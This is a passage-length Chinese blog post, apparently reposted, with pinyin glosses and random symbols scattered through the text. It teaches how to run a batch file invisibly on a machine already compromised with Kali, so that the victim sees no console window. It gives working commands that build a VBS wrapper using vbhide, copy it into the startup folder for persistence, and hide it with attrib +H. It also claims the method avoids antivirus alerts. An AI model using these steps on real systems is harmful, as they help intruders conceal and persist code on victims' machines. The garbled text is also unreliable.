當kali成功溢出目标以後， 如(rú)果我們需要(yào)目标©★δ✘主機(jī)執行(xíng)批處理(lǐ)bat的(de)話(huà)， 目标機(jī)器™• ↕(qì)會(huì)出現(xiàn)黑(hēi)色的(de)彈窗(chuāng)≈©， 用(yòng)戶看(kàn)到(dào)一(yī)個(g  πè)黑(hēi)色彈窗(chuāng)肯定會(huì)奇怪， 以下‍✘©(xià)有(yǒu)兩種方法讓bat文(wén)件(jiàn)運行(xíng)起來(lá÷↑₹i)：

　　1:使用(yòng)bat轉化(huà)為(wèi)exe的(de)工(gōn§££₽g)具 : bat轉exe工(gōng)具(Bat To Exe Converte§&r)，  這(zhè)種方式雖然簡單， 但(dàn)是←™₽↔(shì)殺毒軟件(jiàn)會(huì)報(bào)毒

　　2:把bat文(wén)件(jiàn)通(tōng)過vbs調用(yòng)↕↑≥​， 在vbs執行(xíng)的(de)過程中調用(yòπ&↓ng)bat文(wén)件(jiàn)， vbs調用(y₹≈òng)bat文(wén)件(jiàn)地(dì)時(shí)候，可(kě)以把默認地(♦✔<dì)黑(hēi)色窗(chuāng)口隐藏， 此時(shε☆>>í)系統殺毒軟件(jiàn)不(bù)會(huì)報(bào)毒

　　vbs內(nèi)部的(de)內(nèi)容如(↕δ↔rú)下(xià)， run.bat為(wèi)需要(yàσ✘α©o)執行(xíng)的(de)bat文(wén)件(jià"δ∞n)：

Set ws = CreateObject("Wscript.Shell") 
ws.run "cmd /c c:\run.bat",vbhide 

　　在cmd中執行(xíng)， 手動生(shēng)成vbs文(wén)件(j★♥δiàn)：

echo Set ws = CreateObject("Wscript.Shell") > b.vbs
echo ws.run "cmd /c c:\run.bat",vbhide >> b.vbs

　　然後命令行(xíng)下(xià)繼續執行(xíng)b.vbs即可(kě₽φ)， 實現(xiàn)隐藏執行(xíng)bat文(wén)件(jiàn₩•£♣)

　　把這(zhè)個(gè)vbs複制(zhì)到(dào$↕)c盤的(de)啓動目錄下(xià)， 然後通(tōng)過CMD添加隐藏屬性，™≤​ 即可(kě)神不(bù)知(zhī)鬼不(bù)覺地(dì)啓動了(le)

attrib +H b.vbs

作(zuò)者： NONO 
出處：http://www.cnblogs.com/diligenceday/♥§ 
企業(yè)網站(zhàn)：/
開(kāi)源博客：http://www.github.com/sqqihao
QQ：287101329 
微(wēi)信：18101055830